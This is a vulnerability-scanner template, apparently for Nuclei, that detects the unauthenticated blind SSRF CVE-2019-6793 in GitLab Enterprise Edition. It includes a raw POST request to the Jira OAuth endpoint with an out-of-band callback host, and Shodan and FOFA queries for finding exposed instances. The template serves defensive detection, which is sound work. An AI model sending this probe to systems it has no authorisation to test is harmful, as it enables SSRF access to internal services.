id: CVE-2019-6793

info:
  name: GitLab Enterprise Edition - Server-Side Request Forgery
  author: ritikchaddha
  severity: high
  description: |
    An issue was discovered in GitLab Enterprise Edition before 11.5.8, 11.6.x before 11.6.6, and 11.7.x before 11.7.1. The Jira integration feature is vulnerable to an unauthenticated blind SSRF issue.
  impact: |
    Unauthenticated attackers can exploit blind SSRF to access internal services, potentially retrieving sensitive information or performing unauthorized actions on internal systems.
  remediation: |
    Upgrade to GitLab Enterprise Edition 11.5.8, 11.6.6, 11.7.1 or later versions.
  reference:
    - https://gitlab.com/gitlab-org/gitlab-foss/-/issues/50748
    - https://nvd.nist.gov/vuln/detail/CVE-2019-6793
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L
    cvss-score: 7.0
    cve-id: CVE-2019-6793
    cwe-id: CWE-918
    epss-score: 0.05289
    epss-percentile: 0.90184
    cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:*
  metadata:
    max-request: 1
    vendor: gitlab
    product: gitlab
    shodan-query: html:"GitLab Enterprise Edition"
    fofa-query: body="GitLab Enterprise Edition"
  tags: cve,cve2019,gitlab,enterprise,ssrf,blind,vuln

http:
  - raw:
      - |+
        POST /-/jira/login/oauth/access_token HTTP/1.1
        Host: {{interactsh-url}}

    unsafe: true
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
          - "dns"

      - type: word
        part: body
        words:
          - "access_token="

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100c5a40d576ebfbd089122862a5461267656b12355b34b55809acfbeedd0e711ca02201773877cc4f90218559911ce9acc08b2c55ee8c1549ea037bd494faa31deb03c:922c64590222798bb761d5b6d8e72950